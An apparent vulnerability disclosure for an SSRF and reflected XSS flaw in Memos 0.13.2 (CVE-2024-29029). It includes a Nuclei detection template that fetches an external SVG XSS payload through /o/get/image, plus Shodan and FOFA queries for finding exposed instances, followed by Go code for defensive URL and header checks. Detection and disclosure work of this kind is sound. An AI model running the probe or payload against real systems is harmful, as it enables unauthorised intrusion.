An SSRF vulnerability exists at the `/o/get/image` endpoint that allows unauthenticated users to enumerate the internal network and retrieve images. The body of the fetched image response is then copied into the response of the current server request, causing a reflected XSS vulnerability.

PoC code [public]
```yaml
id: CVE-2024-29029

info:
  name: Memos 0.13.2 - Cross-Site Scripting & SSRF
  author: ritikchaddha
  severity: medium
  description: |
    An SSRF vulnerability exists at the `/o/get/image` that allows unauthenticated users to enumerate the internal network and retrieve images. The response from the image request is then copied into the response of the current server request, causing a reflected XSS vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Memos"
    fofa-query: title="Memos"
  tags: cve,cve2024,xss,memos

http:
  - method: GET
    path:
      - "{{BaseURL}}/o/get/image?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert(document.domain);"
          - "<?xml version"
          - '<script type="text/javascript">'
        condition: and

      - type: word
        part: header
        words:
          - "Content-Security-Policy: default-src 'none';"
        negative: true

      - type: status
        status:
          - 200
# digest: 490a0046304402200294e02316144d5524163e7a692fe211228540eb012abc2aa4a6e2d849321a0102203d818ed3fddcebe6453cc2c65fa3debbf2054e343b2dbeb04f2ab3dbd41fa961:922c64590222798bb761d5b6d8e72950
```
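As an added defensive illustration (not Memos' own code and not part of the template), the two controls an image-fetch proxy of the `/o/get/image?url=` kind needs, written in Go since Memos is a Go project: reject fetch targets inside the server's own network (the SSRF half), and relay only image bodies under the `Content-Security-Policy: default-src 'none';` header whose absence the template's negative matcher flags (the reflected-XSS half). Function names and the exact header set are my assumptions, and hostnames that resolve to internal addresses still need a post-DNS recheck that this offline snippet does not perform.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/url"
	"strings"
)

// ValidateImageFetchURL is the SSRF-side check for an image proxy of the
// /o/get/image?url=... kind: http(s) only, no literal loopback, private,
// link-local or unspecified address. (Hostnames need a post-DNS recheck too.)
func ValidateImageFetchURL(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("unparsable url: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname()
	if host == "" {
		return fmt.Errorf("empty host")
	}
	if ip := net.ParseIP(host); ip != nil &&
		(ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()) {
		return fmt.Errorf("address %s is internal to the proxy's network", ip)
	}
	return nil
}

// ProxyResponseHeaders is the XSS-side check: relay only image/* bodies and
// always set the Content-Security-Policy whose absence the template's negative
// matcher flags, so script inside a relayed SVG cannot run in the app origin.
func ProxyResponseHeaders(upstreamContentType string) (http.Header, error) {
	mediaType := strings.ToLower(strings.TrimSpace(strings.SplitN(upstreamContentType, ";", 2)[0]))
	if !strings.HasPrefix(mediaType, "image/") {
		return nil, fmt.Errorf("upstream content type %q is not an image", mediaType)
	}
	h := http.Header{}
	h.Set("Content-Type", mediaType)
	h.Set("Content-Security-Policy", "default-src 'none';")
	h.Set("X-Content-Type-Options", "nosniff") // stop browsers re-guessing the type
	return h, nil
}

func main() {
	fmt.Println(ValidateImageFetchURL("http://127.0.0.1:8080/internal.png"))
}
```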